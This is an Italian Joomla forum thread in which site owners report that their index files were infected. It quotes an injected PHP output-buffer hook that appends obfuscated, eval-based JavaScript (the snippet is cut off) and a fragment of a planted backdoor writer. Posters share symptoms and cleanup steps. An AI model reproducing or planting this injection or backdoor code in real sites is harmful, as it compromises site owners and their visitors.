<?php ob_start('security_update'); nell'index.php e index2.php

[elasticgirl]

Salve,
Nei file index.php e index2.php ho trovato come prima riga:

Codice: [Seleziona]

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var ez=window;function asd(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var sdkajsnd=String.fromCharCode(101,118,97)+"l";function fds(){return asd($a);}var $a="Z64zZ3
cut
v7Z3c07Non me ne sarei accorta se google webmaster tool non avessi bloccato la mia sitemap.xml.
Andando a verificare il componente xmap in preferenze mi dà questo errore:
Fatal error: Cannot redeclare security_update() (previously declared in /web/htdocs/www.settingweb.it/home/administrator/index2.php:1) in /web/htdocs/www.settingweb.it/home/administrator/index.php  on line 1
effettivamente c'è quella linea di codice che vi ho posto prima.
DOMANDA: è un bug del Joomla 1.5.15 oppure un attacco via ftp?? Come risolvere il problema??

[mau_develop]

postando nella sezione opportuna e prima ancora di farlo leggendo quelli che hanno lo stesso problema.

M.

[sgherzo]

stesso problema,
ma non c'è 1 sezione dedicata alla sicurezza?

[maicolstaip]

Sì,
c'è una sezione dedicata alla sicurezza.
Si chiama "Sicurezza" 

Sposto il messaggio in detta sezione.

[mxgs]

ho scoperto lo stesso problema anch'io. tutti i files index con estensione php sono stati "infettati" con 'sto codice bastardo.

il sito è stato segnalato da Google come a rischio, con tanto di finestra rossa su FireFox.

ho rimosso tutte le occorrenze dello script (sembra che i files index.html non siano stati toccati) e fatto una ricerca su Google per saperne di più. qualcuno afferma che potrebbe essere lo stesso server ad essere stato infettato: elasticgirl, per caso anche il tuo è su un server *** che inizia per AR e finisce per BA - che è il nome di un'isola"? (non lo si può scrivere, a quanto pare, 'sto nome) ***

UPDATE
mi correggo: ho appena trovato lo script dentro il file /components/index.html, quindi anche i files html sono stati infettatti...

UPDATE 2
ho trovato 2 files mooolto sospetti in /images/stories
i nomi sono:
- sets.php
- storieslist.php
ins sets.php alcune linee del codice dicono:

Codice: [Seleziona]

if (!file_write("./unknown.php",$unk,1))exit("yazamadim\n<br>");
else echo "backdoor writed\n<br>";il che mi fa sospettare che il nostro amico s'è aperto una backdoor nel sito, o qualcosa di simile...
boh, come ha fatto non lo so...

[liberatiarts]

Premetto che ho una decina di siti ospitati dal medesimo provider e in uno si è presentato lo stesso problema esposto in questa discussione, nel sito in questione sono stati sovrascritti i file index.php e index2.php sia nella root che in admin, e anche tutti i file index.html situati nelle cartelle principali di joomla -e  inoltre nella parte amministrativa in CONFIGURAZIONE FTP  dove normalmente è vuoto era presente come user: user e una password  -che poi ho cancellato-  Ho trovato tutti file modificati controllando le date delle modifiche (risalenti al il 2 giugno ... ero in ferie)  ho sovrascritto tutti i file infetti e aggiornato alla xx.18 - cambiato tutte le psw - Ora è ancora off-line e a parte l'avviso di firfox-google ancora attivo, il sito sembra ok (con IE lo  vedo senza avvisi o richieste di istallazione o allarmi dell'antivirus )   ma mi rimane il dubbio se occorre fare ulteriori operazioni sul data base o dove?? -  Chi ha risolto il problema, con quali modalità ? e principalmente se conosce anche la causa di questa intrusione  ?? Non vorrei avere gli stessi problemi con gli altri siti o almeno prevenirli   
Grazie !

[mau_develop]

se cerchi invece di appenderti ai post degli altri risolvi e comprendi anche tu, la sezione è piena di casi come il tuo

M.

[liberatiarts]

Grazie troppo gentile!